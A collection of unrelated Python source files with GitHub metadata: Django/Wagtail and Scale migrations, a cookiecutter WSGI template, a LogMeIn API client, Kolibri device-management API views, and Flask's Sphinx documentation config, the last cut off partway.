('choices', models.TextField(blank=True, help_text='Comma separated list of choices. Only applicable in checkboxes, radio and dropdown.', verbose_name='choices')),
('default_value', models.CharField(blank=True, help_text='Default value. Comma separated values supported for checkboxes.', max_length=255, verbose_name='default value')),
('help_text', models.CharField(blank=True, max_length=255, verbose_name='help text')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='FormPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('to_address', models.CharField(blank=True, help_text='Optional - form submissions will be emailed to these addresses. Separate multiple addresses by comma.', max_length=255, verbose_name='to address')),
('from_address', models.CharField(blank=True, max_length=255, verbose_name='from address')),
('subject', models.CharField(blank=True, max_length=255, verbose_name='subject')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='GenericSnippetPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('snippet_object_id', models.PositiveIntegerField(null=True)),
('snippet_content_type', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='contenttypes.ContentType')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='IconSetting',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('site', models.OneToOneField(editable=False, on_delete=django.db.models.deletion.CASCADE, to='wagtailcore.Site')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ManyToManyBlogPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.RichTextField(blank=True)),
('adverts', models.ManyToManyField(blank=True, to='tests.Advert')),
('blog_categories', models.ManyToManyField(blank=True, through='tests.BlogCategoryBlogPage', to='tests.BlogCategory')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='MTIBasePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'verbose_name': 'MTI Base page',
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='MyCustomPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='NotYetRegisteredSetting',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('site', models.OneToOneField(editable=False, on_delete=django.db.models.deletion.CASCADE, to='wagtailcore.Site')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='PageChooserModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='PageWithOldStyleRouteMethod',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('content', models.TextField()),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='SimplePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('content', models.TextField()),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='SingletonPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='SnippetChooserModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('advert', models.ForeignKey(help_text='help text', on_delete=django.db.models.deletion.CASCADE, to='tests.Advert')),
],
),
migrations.CreateModel(
name='StandardChild',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='StandardIndex',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='StreamModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('body', wagtail.core.fields.StreamField((('text', wagtail.core.blocks.CharBlock()), ('rich_text', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock())))),
],
),
migrations.CreateModel(
name='StreamPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.StreamField((('text', wagtail.core.blocks.CharBlock()), ('rich_text', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock())))),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='TaggedPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='TaggedPageTag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content_object', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='tagged_items', to='tests.TaggedPage')),
('tag', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='tests_taggedpagetag_items', to='taggit.Tag')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='TestSetting',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('email', models.EmailField(max_length=50)),
('site', models.OneToOneField(editable=False, on_delete=django.db.models.deletion.CASCADE, to='wagtailcore.Site')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ValidatedPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('foo', models.CharField(max_length=255)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='MTIChildPage',
fields=[
('mtibasepage_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='tests.MTIBasePage')),
],
options={
'abstract': False,
},
bases=('tests.mtibasepage',),
),
migrations.CreateModel(
name='SingleEventPage',
fields=[
('eventpage_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='tests.EventPage')),
('excerpt', models.TextField(blank=True, help_text='Short text to describe what is this action about', max_length=255, null=True)),
],
options={
'abstract': False,
},
bases=('tests.eventpage',),
),
migrations.AddField(
model_name='taggedpage',
name='tags',
field=modelcluster.contrib.taggit.ClusterTaggableManager(blank=True, help_text='A comma-separated list of tags.', through='tests.TaggedPageTag', to='taggit.Tag', verbose_name='Tags'),
),
migrations.AddField(
model_name='pagechoosermodel',
name='page',
field=models.ForeignKey(help_text='help text', on_delete=django.db.models.deletion.CASCADE, to='wagtailcore.Page'),
),
migrations.AddField(
model_name='formfield',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='form_fields', to='tests.FormPage'),
),
migrations.AddField(
model_name='eventpagespeaker',
name='link_page',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page'),
),
migrations.AddField(
model_name='eventpagespeaker',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='speakers', to='tests.EventPage'),
),
migrations.AddField(
model_name='eventpagerelatedlink',
name='link_page',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page'),
),
migrations.AddField(
model_name='eventpagerelatedlink',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='tests.EventPage'),
),
migrations.AddField(
model_name='eventpagechoosermodel',
name='page',
field=models.ForeignKey(help_text='more help text', on_delete=django.db.models.deletion.CASCADE, to='tests.EventPage'),
),
migrations.AddField(
model_name='eventpagecarouselitem',
name='link_page',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page'),
),
migrations.AddField(
model_name='eventpagecarouselitem',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='carousel_items', to='tests.EventPage'),
),
migrations.AddField(
model_name='eventpage',
name='feed_image',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image'),
),
migrations.AddField(
model_name='blogcategoryblogpage',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='categories', to='tests.ManyToManyBlogPage'),
),
migrations.AddField(
model_name='advertplacement',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='advert_placements', to='wagtailcore.Page'),
),
migrations.AddField(
model_name='advert',
name='tags',
field=taggit.managers.TaggableManager(blank=True, help_text='A comma-separated list of tags.', through='tests.AdvertTag', to='taggit.Tag', verbose_name='Tags'),
),
]
| {
"content_hash": "6b4736973d53cba2c7e9f2ef6bec066a",
"timestamp": "",
"source": "github",
"line_count": 584,
"max_line_length": 385,
"avg_line_length": 51.87328767123287,
"alnum_prop": 0.5730177592922691,
"repo_name": "nealtodd/wagtail",
"id": "032928e6ea38ee6079770a63ba64fc6f498b7f4f",
"size": "30366",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "wagtail/tests/testapp/migrations/0001_initial.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "190511"
},
{
"name": "Dockerfile",
"bytes": "703"
},
{
"name": "HTML",
"bytes": "371011"
},
{
"name": "JavaScript",
"bytes": "262163"
},
{
"name": "Makefile",
"bytes": "992"
},
{
"name": "Python",
"bytes": "3564287"
},
{
"name": "Shell",
"bytes": "8289"
}
],
"symlink_target": ""
} |
"""
WSGI config for MyProject project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
{% if cookiecutter.heroku_deployment_method != 'none' %}from whitenoise.django import DjangoWhiteNoise{% endif %}
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings")
application = get_wsgi_application()
{% if cookiecutter.heroku_deployment_method != 'none' %}application = DjangoWhiteNoise(application){% endif %}
| {
"content_hash": "3ac04c08d5058d8186c3612d417480c3",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 113,
"avg_line_length": 36.294117647058826,
"alnum_prop": 0.766612641815235,
"repo_name": "tamj0rd2/cookiecutter-drfreact",
"id": "20d9a9d2ebedd34ab61b1799848f0362261e0174",
"size": "617",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "{{ cookiecutter.project_slug }}/config/wsgi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "268"
},
{
"name": "JavaScript",
"bytes": "4739"
},
{
"name": "Python",
"bytes": "9241"
}
],
"symlink_target": ""
} |
import json
import logging
import os
# Requests
import requests
from requests.structures import CaseInsensitiveDict
__all__ = []
logger = logging.getLogger('lmiapi.public')
class LogMeInPublicAPIBase(object):
API_ROOT = None
def __init__(self, creds):
assert self.API_ROOT
self.creds = self._check_creds(creds)
self.session = requests.Session()
self.session.headers.update({'Accept': 'application/JSON'})
self.session.headers.update({'Authorization': json.dumps(self.creds)})
def _check_creds(self, creds):
d = CaseInsensitiveDict()
if isinstance(creds, dict):
d.update(creds)
elif isinstance(creds, basestring):
if os.path.exists(creds):
creds = file(creds, 'r').read()
for line in creds.splitlines():
if ':' in line:
k, v = line.split(':', 1)
d[k.strip()] = v.strip()
else:
raise TypeError('unsupported type for credentials data')
if 'companyId' not in d and 'CID' in d:
d['companyId'] = d['CID']
if 'companyId' in d and 'psk' not in d:
raise ValueError('psk is required when companyId is provided')
elif 'psk' in d and 'companyId' not in d:
raise ValueError('companyId is required when psk is provided')
elif 'companyId' in d and 'psk' in d:
return {
'companyId': int(d['companyId']),
'psk': str(d['psk']),
}
elif 'loginSessionId' in d and 'profileId' not in d:
raise ValueError('profileId is required when loginSessionId is '
'provided')
elif 'profileId' in d and 'loginSessionId' not in d:
raise ValueError('loginSessionId is required when profileId is '
'provided')
elif 'loginSessionId' in d and 'profileId' in d:
return {
'loginSessionId': str(d['loginSessionId']),
'profileId': int(d['profileId']),
}
else:
raise ValueError('either companyId+psk or '
'loginSessionId+profileId must be provided')
def _get(self, path, v1=False):
api_root = self.API_ROOT.replace('/v2/', '/v1/') if v1 else self.API_ROOT
url = '{}{}'.format(api_root, path.lstrip('/'))
response = self.session.get(url)
logger.debug('GET %s -> %d', url, response.status_code)
response.raise_for_status()
if response.status_code != 204:
return response.json()
def _post(self, path, data=None, v1=False):
api_root = self.API_ROOT.replace('/v2/', '/v1/') if v1 else self.API_ROOT
url = '{}{}'.format(api_root, path.lstrip('/'))
if data:
headers = {'Content-Type': 'application/JSON'}
data = json.dumps(data)
else:
headers = {}
data = None
response = self.session.post(url, data=data, headers=headers)
logger.debug('POST %s -> %d', url, response.status_code)
response.raise_for_status()
if response.status_code != 204:
return response.json()
def _put(self, path, data, v1=False):
api_root = self.API_ROOT.replace('/v2/', '/v1/') if v1 else self.API_ROOT
url = '{}{}'.format(api_root, path.lstrip('/'))
headers = {'Content-Type': 'application/JSON'}
data = json.dumps(data)
response = self.session.put(url, data=data, headers=headers)
logger.debug('PUT %s -> %d', url, response.status_code)
response.raise_for_status()
if response.status_code != 204:
return response.json()
def _delete(self, path, data=None, v1=False):
api_root = self.API_ROOT.replace('/v2/', '/v1/') if v1 else self.API_ROOT
url = '{}{}'.format(api_root, path.lstrip('/'))
if data:
headers = {'Content-Type': 'application/JSON'}
data = json.dumps(data)
else:
headers = {}
data = None
response = self.session.delete(url, data=data, headers=headers)
logger.debug('DELETE %s -> %d', url, response.status_code)
response.raise_for_status()
if response.status_code != 204:
return response.json()
def authentication(self):
return self._get('/authentication')
| {
"content_hash": "16f57295e2b6f5a3dea3b36f010cb036",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 81,
"avg_line_length": 38.71304347826087,
"alnum_prop": 0.5559299191374663,
"repo_name": "ninemoreminutes/lmiapi",
"id": "98488dd33bda6937fcebfe11bb87da45f40b2eda",
"size": "4461",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lmiapi/public.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "836"
},
{
"name": "Python",
"bytes": "33393"
}
],
"symlink_target": ""
} |
import uuid
from django.db.models import Case
from django.db.models import When
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import viewsets
from rest_framework.exceptions import ParseError
from rest_framework.response import Response
from rest_framework.serializers import ValidationError
from rest_framework.views import APIView
from kolibri.core.content.api import ChannelMetadataFilter
from kolibri.core.content.models import ChannelMetadata
from kolibri.core.content.models import ContentNode
from kolibri.core.content.permissions import CanManageContent
from kolibri.core.content.serializers import ChannelMetadataSerializer
from kolibri.core.content.utils.annotation import total_file_size
from kolibri.core.content.utils.content_types_tools import (
renderable_contentnodes_without_topics_q_filter,
)
from kolibri.core.content.utils.file_availability import LocationError
from kolibri.core.content.utils.import_export_content import get_import_export_data
from kolibri.core.content.utils.upgrade import CHANNEL_UPDATE_STATS_CACHE_KEY
from kolibri.core.device.models import ContentCacheKey
from kolibri.core.utils.cache import process_cache
class DeviceChannelMetadataSerializer(ChannelMetadataSerializer):
def to_representation(self, instance):
value = super(ChannelMetadataSerializer, self).to_representation(instance)
# if the request includes a GET param 'include_fields', add the requested calculated fields
if "request" in self.context:
include_fields = (
self.context["request"].GET.get("include_fields", "").split(",")
)
if include_fields:
# build querysets for the full set of channel nodes, as well as those that are unrenderable
channel_nodes = ContentNode.objects.filter(channel_id=instance.id)
unrenderable_nodes = channel_nodes.exclude(
renderable_contentnodes_without_topics_q_filter
)
if "total_resources" in include_fields:
# count the total number of renderable non-topic resources in the channel
# (note: it's faster to count them all and then subtract the unrenderables, of which there are fewer)
value["total_resources"] = (
channel_nodes.count() - unrenderable_nodes.count()
)
if "total_file_size" in include_fields:
# count the total file size of files associated with renderable content nodes
# (note: it's faster to count them all and then subtract the unrenderables, of which there are fewer)
value["total_file_size"] = total_file_size(
channel_nodes
) - total_file_size(unrenderable_nodes)
if "on_device_resources" in include_fields:
# read the precalculated total number of resources from the channel already available
value["on_device_resources"] = instance.total_resource_count
if "on_device_file_size" in include_fields:
# read the precalculated total size of available files associated with the channel
value["on_device_file_size"] = instance.published_size
new_resource_stats = process_cache.get(
CHANNEL_UPDATE_STATS_CACHE_KEY.format(instance.id)
)
if "new_resource_count" in include_fields and new_resource_stats:
new_resource_ids = new_resource_stats.get("new_resource_ids")
value["new_resource_count"] = (
len(new_resource_ids) if new_resource_ids is not None else None
)
if "new_resource_total_size" in include_fields and new_resource_stats:
new_resource_stats = process_cache.get(
CHANNEL_UPDATE_STATS_CACHE_KEY.format(instance.id)
)
value["new_resource_total_size"] = new_resource_stats.get(
"new_resource_total_size", None
)
return value
class DeviceChannelMetadataViewSet(viewsets.ReadOnlyModelViewSet):
serializer_class = DeviceChannelMetadataSerializer
filter_backends = (DjangoFilterBackend,)
filter_class = ChannelMetadataFilter
permission_classes = (CanManageContent,)
def get_queryset(self):
return ChannelMetadata.objects.all().select_related("root__lang")
class CalculateImportExportSizeView(APIView):
permission_classes = (CanManageContent,)
def post(self, request):
try:
channel_id = self.request.data["channel_id"]
except KeyError:
raise ValidationError(
"channel_id is required for calculating file size and resource counts"
)
drive_id = self.request.data.get("drive_id")
peer_id = self.request.data.get("peer_id")
for_export = self.request.data.get("export")
node_ids = self.request.data.get("node_ids")
exclude_node_ids = self.request.data.get("exclude_node_ids")
flag_count = sum(int(bool(flag)) for flag in (drive_id, peer_id, for_export))
if flag_count > 1:
raise ValidationError(
"Must specify at most one of drive_id, peer_id, and export"
)
# By default filter to unavailable files
available = False
if for_export:
available = True
try:
(
total_resource_count,
_,
total_bytes_to_transfer,
) = get_import_export_data(
channel_id,
node_ids,
exclude_node_ids,
available,
drive_id=drive_id,
peer_id=peer_id,
)
except LocationError:
if drive_id:
raise ValidationError(
"The external drive with given drive id {} does not exist.".format(
drive_id
)
)
if peer_id:
raise ValidationError(
"The network location with the id {} does not exist".format(peer_id)
)
return Response(
{
"resource_count": total_resource_count,
"file_size": total_bytes_to_transfer,
}
)
def validate_uuid(value):
try:
uuid.UUID(value, version=4)
return True
except ValueError:
return False
class DeviceChannelOrderView(APIView):
permission_classes = (CanManageContent,)
def post(self, request, *args, **kwargs):
try:
ids = request.data
if not isinstance(ids, list):
raise AssertionError
if not all(map(validate_uuid, ids)):
raise AssertionError
except AssertionError:
raise ParseError("Array of ids not sent in body of request")
queryset = ChannelMetadata.objects.filter(root__available=True)
total_channels = queryset.count()
if len(ids) != total_channels:
raise ParseError(
"Expected {} ids, but only received {}".format(total_channels, len(ids))
)
if queryset.filter_by_uuids(ids).count() != len(ids):
raise ParseError(
"List of ids does not match the available channels on the server"
)
queryset.update(
order=Case(*(When(id=uuid, then=i + 1) for i, uuid in enumerate(ids)))
)
ContentCacheKey.update_cache_key()
return Response({})
| {
"content_hash": "a8dd435bfb759a39b227ec6b3f89a5b5",
"timestamp": "",
"source": "github",
"line_count": 191,
"max_line_length": 121,
"avg_line_length": 40.973821989528794,
"alnum_prop": 0.6055456171735242,
"repo_name": "learningequality/kolibri",
"id": "e7aa42c077b6b0ecd3ddd8de31936c651e6bd21d",
"size": "7826",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "kolibri/plugins/device/api.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3095586"
},
{
"name": "Dockerfile",
"bytes": "3559"
},
{
"name": "Gherkin",
"bytes": "996801"
},
{
"name": "HTML",
"bytes": "22573"
},
{
"name": "JavaScript",
"bytes": "2233801"
},
{
"name": "Makefile",
"bytes": "12972"
},
{
"name": "Python",
"bytes": "3652744"
},
{
"name": "SCSS",
"bytes": "8551"
},
{
"name": "Shell",
"bytes": "3867"
},
{
"name": "Vue",
"bytes": "2193917"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('scheduler', '0007_scheduler_num_message_handlers'),
]
operations = [
migrations.AlterField(
model_name='scheduler',
name='num_message_handlers',
field=models.IntegerField(default=1),
),
]
| {
"content_hash": "be2ea75eaa99a297c91f45efdaa9ab56",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 61,
"avg_line_length": 22.666666666666668,
"alnum_prop": 0.6151960784313726,
"repo_name": "ngageoint/scale",
"id": "3f16ffcf7fe017e892f2e434b3f71c81746900af",
"size": "481",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scale/scheduler/migrations/0008_auto_20171103_1334.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "7219"
},
{
"name": "CSS",
"bytes": "12193"
},
{
"name": "Dockerfile",
"bytes": "14853"
},
{
"name": "HCL",
"bytes": "301"
},
{
"name": "HTML",
"bytes": "48818"
},
{
"name": "JavaScript",
"bytes": "503"
},
{
"name": "Makefile",
"bytes": "5852"
},
{
"name": "Python",
"bytes": "5295677"
},
{
"name": "Shell",
"bytes": "26650"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import os
import sys
import pkg_resources
import time
import datetime
BUILD_DATE = datetime.datetime.utcfromtimestamp(int(os.environ.get('SOURCE_DATE_EPOCH', time.time())))
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.join(os.path.dirname(__file__), '_themes'))
sys.path.append(os.path.dirname(__file__))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'flaskdocext'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Flask'
copyright = u'2010 - {0}, Armin Ronacher'.format(BUILD_DATE.year)
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
try:
release = pkg_resources.get_distribution('Flask').version
except pkg_resources.DistributionNotFound:
print('Flask must be installed to build the documentation.')
print('Install from source using `pip install -e .` in a virtualenv.')
sys.exit(1)
if 'dev' in release:
release = ''.join(release.partition('dev')[:2])
version = '.'.join(release.split('.')[:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar. Do not set, template magic!
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/flask-favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
html_sidebars = {
'index': [
'sidebarintro.html',
'sourcelink.html',
'searchbox.html'
],
'**': [
'sidebarlogo.html',
'localtoc.html',
'relations.html',
'sourcelink.html',
'searchbox.html'
]
}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_use_modindex = False
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Flaskdoc'
# -- Options for LaTeX output --------------------------------------------------
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('latexindex', 'Flask.tex', u'Flask Documentation', u'Armin Ronacher', 'manual'),
]
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
latex_use_modindex = False
latex_elements = {
'fontpkg': r'\usepackage{mathpazo}',
'papersize': 'a4paper',
'pointsize': '12pt',
'preamble': r'\usepackage{flaskstyle}'
}
latex_use_parts = True
latex_additional_files = ['flaskstyle.sty', 'logo.pdf']
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
#epub_title = ''
#epub_author = ''
#epub_publisher = ''
#epub_copyright = ''
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
intersphinx_mapping = {
'python': ('https://docs.python.org/3/', None),
'werkzeug': ('http://werkzeug.pocoo.org/docs/', None),
'click': ('http://click.pocoo.org/', None),
'jinja': ('http://jinja.pocoo.org/docs/', None),
'sqlalchemy': ('http://docs.sqlalchemy.org/en/latest/', None),
'wtforms': ('https://wtforms.readthedocs.io/en/latest/', None),
'blinker': ('https://pythonhosted.org/blinker/', None)
}
try:
__import__('flask_theme_support')
pygments_style = 'flask_theme_support.FlaskyStyle'
html_theme = 'flask'
html_theme_options = {
'touch_icon': 'touch-icon.png'
}
except ImportError:
print('-' * 74)
print('Warning: Flask themes unavailable. Building with default theme')
print('If you want the Flask themes, run this command and build again:')
print()
print(' git submodule update --init')
print('-' * 74)
# unwrap decorators
def unwrap_decorators():
import sphinx.util.inspect as inspect
import functools
old_getargspec = inspect.getargspec
def getargspec(x):
return old_getargspec(getattr(x, '_original_function', x))
inspect.getargspec = getargspec
old_update_wrapper = functools.update_wrapper
def update_wrapper(wrapper, wrapped, *a, **kw):
rv = old_update_wrapper(wrapper, wrapped, *a, **kw)
rv._original_function = wrapped
return rv
functools.update_wrapper = update_wrapper
unwrap_decorators()
del unwrap_decorators
| {
"content_hash": "e6d2f3a7379e88fbacee10459424e4cc",
"timestamp": "",
"source": "github",
"line_count": 290,
"max_line_length": 102,
"avg_line_length": 32.179310344827584,
"alnum_prop": 0.6899914273467638,
"repo_name": "auready/flask",
"id": "81106a3ac744c007d095081a47d20aff06ee7172",
"size": "9747",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/conf.py",
